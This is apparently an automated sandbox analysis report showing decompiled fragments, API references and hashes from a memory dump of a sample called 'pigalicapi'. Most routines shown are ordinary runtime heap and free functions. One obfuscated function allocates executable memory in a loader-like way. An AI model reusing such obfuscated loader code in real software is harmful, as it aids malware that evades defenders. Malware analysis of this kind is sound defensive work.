                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                                                                                      				signed int _t18;
                                                                                                                                                                                                                                                                      				long _t19;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                                                                                      				if(_t18 == 0) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                                      					if(_t19 == 0) {
                                                                                                                                                                                                                                                                      						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t8 = RtlAllocateHeap( *0x104e1b0, 8, _t19); // executed
                                                                                                                                                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						__eflags = E00FBC742();
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							L8:
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(E00FB9826())) = 0xc;
                                                                                                                                                                                                                                                                      							__eflags = 0;
                                                                                                                                                                                                                                                                      							return 0;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t12 = E00FBC6AC(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                                      						_pop(_t15);
                                                                                                                                                                                                                                                                      						__eflags = _t12;
                                                                                                                                                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                      				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x00fba67d
                                                                                                                                                                                                                                                                      0x00fba683
                                                                                                                                                                                                                                                                      0x00fba688
                                                                                                                                                                                                                                                                      0x00fba696
                                                                                                                                                                                                                                                                      0x00fba696
                                                                                                                                                                                                                                                                      0x00fba69c
                                                                                                                                                                                                                                                                      0x00fba69e
                                                                                                                                                                                                                                                                      0x00fba69e
                                                                                                                                                                                                                                                                      0x00fba6b5
                                                                                                                                                                                                                                                                      0x00fba6be
                                                                                                                                                                                                                                                                      0x00fba6c6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba6a6
                                                                                                                                                                                                                                                                      0x00fba6a8
                                                                                                                                                                                                                                                                      0x00fba6ca
                                                                                                                                                                                                                                                                      0x00fba6cf
                                                                                                                                                                                                                                                                      0x00fba6d5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba6d5
                                                                                                                                                                                                                                                                      0x00fba6ab
                                                                                                                                                                                                                                                                      0x00fba6b0
                                                                                                                                                                                                                                                                      0x00fba6b1
                                                                                                                                                                                                                                                                      0x00fba6b3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba6b3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba6b5
                                                                                                                                                                                                                                                                      0x00fba68e
                                                                                                                                                                                                                                                                      0x00fba694
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FB9C5E,00000001,00000364,?,00FB4B88,?), ref: 00FBA6BE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3c69e369ae150a1527107f12218429b3c000cd45ec4bcbf0d3f77e53a6c63573
                                                                                                                                                                                                                                                                      • Instruction ID: 1091a4962b22bded2b3b9665c59dab19526af27ec3f980c1d45828af89358d5a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c69e369ae150a1527107f12218429b3c000cd45ec4bcbf0d3f77e53a6c63573
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0F0E972A042246BDB215A339C05FDB374BBF51770F1C4021B915D71A0DA74DC00BEE6
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 300 fbbd19-fbbd25 301 fbbd57-fbbd62 call fb9826 300->301 302 fbbd27-fbbd29 300->302 310 fbbd64-fbbd66 301->310 304 fbbd2b-fbbd2c 302->304 305 fbbd42-fbbd53 RtlAllocateHeap 302->305 304->305 306 fbbd2e-fbbd35 call fbc742 305->306 307 fbbd55 305->307 306->301 312 fbbd37-fbbd40 call fbc6ac 306->312 307->310 312->301 312->305
                                                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                                                      			E00FBBD19(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                                                                                      				long _t8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t7 = __ecx;
                                                                                                                                                                                                                                                                      				_t8 = _a4;
                                                                                                                                                                                                                                                                      				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(E00FB9826())) = 0xc;
                                                                                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                                                                                      					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t4 = RtlAllocateHeap( *0x104e1b0, 0, _t8); // executed
                                                                                                                                                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					__eflags = E00FBC742();
                                                                                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t6 = E00FBC6AC(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                                      					_pop(_t7);
                                                                                                                                                                                                                                                                      					__eflags = _t6;
                                                                                                                                                                                                                                                                      					if(_t6 == 0) {
                                                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                                                      0x00fbbd19
                                                                                                                                                                                                                                                                      0x00fbbd1f
                                                                                                                                                                                                                                                                      0x00fbbd25
                                                                                                                                                                                                                                                                      0x00fbbd57
                                                                                                                                                                                                                                                                      0x00fbbd5c
                                                                                                                                                                                                                                                                      0x00fbbd62
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbd62
                                                                                                                                                                                                                                                                      0x00fbbd29
                                                                                                                                                                                                                                                                      0x00fbbd2b
                                                                                                                                                                                                                                                                      0x00fbbd2b
                                                                                                                                                                                                                                                                      0x00fbbd42
                                                                                                                                                                                                                                                                      0x00fbbd4b
                                                                                                                                                                                                                                                                      0x00fbbd53
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbd33
                                                                                                                                                                                                                                                                      0x00fbbd35
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbd38
                                                                                                                                                                                                                                                                      0x00fbbd3d
                                                                                                                                                                                                                                                                      0x00fbbd3e
                                                                                                                                                                                                                                                                      0x00fbbd40
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbd40
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00FBA5A1,00000000), ref: 00FBBD4B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: e1790bb29a82c50005ff93fbdab8796a9adb447a509db425b1f01d17a8b83e5e
                                                                                                                                                                                                                                                                      • Instruction ID: 9614c55b632714a3a8d238dd7b316df4e5175e12e50cece610ece4f2ac3ec57b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1790bb29a82c50005ff93fbdab8796a9adb447a509db425b1f01d17a8b83e5e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE065319446255BD62136679C05BEB374CAB493B0F650111AD559A1A0DBDCDC00BDE0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 316 fb47e0-fb4843 317 fb4849-fb4856 316->317 318 fb48ef-fb48f5 316->318 319 fb4889-fb48be VirtualAlloc 317->319 320 fb4858-fb4887 317->320 321 fb4900-fb4912 318->321 322 fb48c3-fb48ea 319->322 320->322 323 fb4984-fb498d 321->323 324 fb4914-fb492c 321->324 322->323 325 fb4937-fb4957 324->325 326 fb4959-fb497d 325->326 327 fb497f 325->327 326->325 327->321
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FB47E0(signed int _a4, intOrPtr _a8, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				long _v44;
                                                                                                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                                                                                                                                      				intOrPtr _t94;
                                                                                                                                                                                                                                                                      				intOrPtr _t107;
                                                                                                                                                                                                                                                                      				intOrPtr _t123;
                                                                                                                                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v28 = _a16 - 0x2598;
                                                                                                                                                                                                                                                                      				_v36 = _a24 + 0x14d;
                                                                                                                                                                                                                                                                      				_v24 = _a20 - 0xce;
                                                                                                                                                                                                                                                                      				_v8 = _a4 ^ 0x000002bf;
                                                                                                                                                                                                                                                                      				_v40 = _a24 + 0x221;
                                                                                                                                                                                                                                                                      				_v16 = _a16 ^ 0x00000221;
                                                                                                                                                                                                                                                                      				_v32 = _a20 + 0x1ce;
                                                                                                                                                                                                                                                                      				if(_v8 == _v40 - 0x219) {
                                                                                                                                                                                                                                                                      					_v12 = _v28;
                                                                                                                                                                                                                                                                      					while(_v12 < (_v16 & 0x0000253b) - 0x2633) {
                                                                                                                                                                                                                                                                      						_t94 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_v20 =  *((intOrPtr*)(_t94 + 0xbadc65));
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							_t74 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      							if(_v20 <= (_v16 | 0x00002801) +  *((intOrPtr*)(_t74 + 0xbadc81))) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v24 = ( *(_a8 + 0xec) & 0x00002796) -  *((intOrPtr*)(_a8 + 0xbadbed)) + _v24;
                                                                                                                                                                                                                                                                      							_v20 = _v20 + 3;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a8 + 0xb0)) <= 0xd708) {
                                                                                                                                                                                                                                                                      						_v48 = 0x3000;
                                                                                                                                                                                                                                                                      						_t123 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t26 = _t123 + 0x8c; // 0x0
                                                                                                                                                                                                                                                                      						_v44 =  *_t26 + 0x40;
                                                                                                                                                                                                                                                                      						_t82 = VirtualAlloc(0,  *(_a8 + 0x24), _v48, _v44); // executed
                                                                                                                                                                                                                                                                      						 *0x104d684 = _t82 + 0x2000;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t87 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t23 = _t87 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t107 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						 *(_t107 + 0xdc) = ( *(_a8 + 0x9c) ^  *(_a8 + 0x8c)) + 0x0001cd0c |  *_t23;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t84 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t34 = _t84 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                                      					_t127 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t127 + 0x5c)) =  *_t34 +  *(_a8 + 0x8c) - 0x4b764;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v32 ^ 0x0000003b;
                                                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                                                      0x00fb47ee
                                                                                                                                                                                                                                                                      0x00fb47fa
                                                                                                                                                                                                                                                                      0x00fb4806
                                                                                                                                                                                                                                                                      0x00fb4811
                                                                                                                                                                                                                                                                      0x00fb481d
                                                                                                                                                                                                                                                                      0x00fb4829
                                                                                                                                                                                                                                                                      0x00fb4834
                                                                                                                                                                                                                                                                      0x00fb4843
                                                                                                                                                                                                                                                                      0x00fb48f2
                                                                                                                                                                                                                                                                      0x00fb4900
                                                                                                                                                                                                                                                                      0x00fb491c
                                                                                                                                                                                                                                                                      0x00fb4929
                                                                                                                                                                                                                                                                      0x00fb4937
                                                                                                                                                                                                                                                                      0x00fb4948
                                                                                                                                                                                                                                                                      0x00fb4957
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb497a
                                                                                                                                                                                                                                                                      0x00fb4934
                                                                                                                                                                                                                                                                      0x00fb4934
                                                                                                                                                                                                                                                                      0x00fb48fd
                                                                                                                                                                                                                                                                      0x00fb48fd
                                                                                                                                                                                                                                                                      0x00fb4849
                                                                                                                                                                                                                                                                      0x00fb4856
                                                                                                                                                                                                                                                                      0x00fb4889
                                                                                                                                                                                                                                                                      0x00fb4890
                                                                                                                                                                                                                                                                      0x00fb4896
                                                                                                                                                                                                                                                                      0x00fb489f
                                                                                                                                                                                                                                                                      0x00fb48b3
                                                                                                                                                                                                                                                                      0x00fb48be
                                                                                                                                                                                                                                                                      0x00fb4858
                                                                                                                                                                                                                                                                      0x00fb4870
                                                                                                                                                                                                                                                                      0x00fb4875
                                                                                                                                                                                                                                                                      0x00fb487b
                                                                                                                                                                                                                                                                      0x00fb4881
                                                                                                                                                                                                                                                                      0x00fb4881
                                                                                                                                                                                                                                                                      0x00fb48c9
                                                                                                                                                                                                                                                                      0x00fb48ce
                                                                                                                                                                                                                                                                      0x00fb48e1
                                                                                                                                                                                                                                                                      0x00fb48e7
                                                                                                                                                                                                                                                                      0x00fb48e7
                                                                                                                                                                                                                                                                      0x00fb498d

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,?), ref: 00FB48B3
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 58dce658c4f1795e472daac0b3b4856de178ab1c7faa7f6a6742d700e3cfe115
                                                                                                                                                                                                                                                                      • Instruction ID: a0a5a3f8d7d83d6d0d035db4230db602ba03bfab47a024858d08e6ed1b3f018b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58dce658c4f1795e472daac0b3b4856de178ab1c7faa7f6a6742d700e3cfe115
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74510874A00109DFEB04CF98D594BAEB7B2FB98304F20C26AD819AB345D735AA41CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FBAC2C(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t74 = _a4;
                                                                                                                                                                                                                                                                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                                      				if(_t25 != 0 && _t25 != 0x104dd10) {
                                                                                                                                                                                                                                                                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                                      					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                                      						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                                      							E00FBA6DA(_t46);
                                                                                                                                                                                                                                                                      							E00FBBA92( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                                      						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                                      							E00FBA6DA(_t47);
                                                                                                                                                                                                                                                                      							E00FBBB90( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						E00FBA6DA( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                                      						E00FBA6DA( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                                      				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                                      					E00FBA6DA( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E00FBAD9F( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                                      				_t28 = 6;
                                                                                                                                                                                                                                                                      				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                                      				_v8 = _t28;
                                                                                                                                                                                                                                                                      				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t70 - 8)) != 0x104d7d0) {
                                                                                                                                                                                                                                                                      						_t31 =  *_t70;
                                                                                                                                                                                                                                                                      						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                                      							E00FBA6DA(_t31);
                                                                                                                                                                                                                                                                      							E00FBA6DA( *_t55);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t28 = _v8;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                                      						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                                      							E00FBA6DA(_t29);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t28 = _v8;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                      					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                                      					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                      					_v8 = _t28;
                                                                                                                                                                                                                                                                      				} while (_t28 != 0);
                                                                                                                                                                                                                                                                      				return E00FBA6DA(_t74);
                                                                                                                                                                                                                                                                      			}















                                                                                                                                                                                                                                                                      0x00fbac34
                                                                                                                                                                                                                                                                      0x00fbac38
                                                                                                                                                                                                                                                                      0x00fbac40
                                                                                                                                                                                                                                                                      0x00fbac49
                                                                                                                                                                                                                                                                      0x00fbac4e
                                                                                                                                                                                                                                                                      0x00fbac55
                                                                                                                                                                                                                                                                      0x00fbac5d
                                                                                                                                                                                                                                                                      0x00fbac65
                                                                                                                                                                                                                                                                      0x00fbac70
                                                                                                                                                                                                                                                                      0x00fbac76
                                                                                                                                                                                                                                                                      0x00fbac77
                                                                                                                                                                                                                                                                      0x00fbac7f
                                                                                                                                                                                                                                                                      0x00fbac87
                                                                                                                                                                                                                                                                      0x00fbac92
                                                                                                                                                                                                                                                                      0x00fbac98
                                                                                                                                                                                                                                                                      0x00fbac9c
                                                                                                                                                                                                                                                                      0x00fbaca7
                                                                                                                                                                                                                                                                      0x00fbacad
                                                                                                                                                                                                                                                                      0x00fbac4e
                                                                                                                                                                                                                                                                      0x00fbacae
                                                                                                                                                                                                                                                                      0x00fbacb6
                                                                                                                                                                                                                                                                      0x00fbacc9
                                                                                                                                                                                                                                                                      0x00fbacdc
                                                                                                                                                                                                                                                                      0x00fbacea
                                                                                                                                                                                                                                                                      0x00fbacf5
                                                                                                                                                                                                                                                                      0x00fbacfa
                                                                                                                                                                                                                                                                      0x00fbad03
                                                                                                                                                                                                                                                                      0x00fbad0b
                                                                                                                                                                                                                                                                      0x00fbad0c
                                                                                                                                                                                                                                                                      0x00fbad12
                                                                                                                                                                                                                                                                      0x00fbad15
                                                                                                                                                                                                                                                                      0x00fbad18
                                                                                                                                                                                                                                                                      0x00fbad1f
                                                                                                                                                                                                                                                                      0x00fbad21
                                                                                                                                                                                                                                                                      0x00fbad25
                                                                                                                                                                                                                                                                      0x00fbad2d
                                                                                                                                                                                                                                                                      0x00fbad34
                                                                                                                                                                                                                                                                      0x00fbad3a
                                                                                                                                                                                                                                                                      0x00fbad3b
                                                                                                                                                                                                                                                                      0x00fbad3b
                                                                                                                                                                                                                                                                      0x00fbad42
                                                                                                                                                                                                                                                                      0x00fbad44
                                                                                                                                                                                                                                                                      0x00fbad49
                                                                                                                                                                                                                                                                      0x00fbad51
                                                                                                                                                                                                                                                                      0x00fbad56
                                                                                                                                                                                                                                                                      0x00fbad57
                                                                                                                                                                                                                                                                      0x00fbad57
                                                                                                                                                                                                                                                                      0x00fbad5a
                                                                                                                                                                                                                                                                      0x00fbad5d
                                                                                                                                                                                                                                                                      0x00fbad60
                                                                                                                                                                                                                                                                      0x00fbad63
                                                                                                                                                                                                                                                                      0x00fbad63
                                                                                                                                                                                                                                                                      0x00fbad75

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00FBAC70
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBAAF
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBAC1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBAD3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBA92: _free.LIBCMT ref: 00FBBAE5
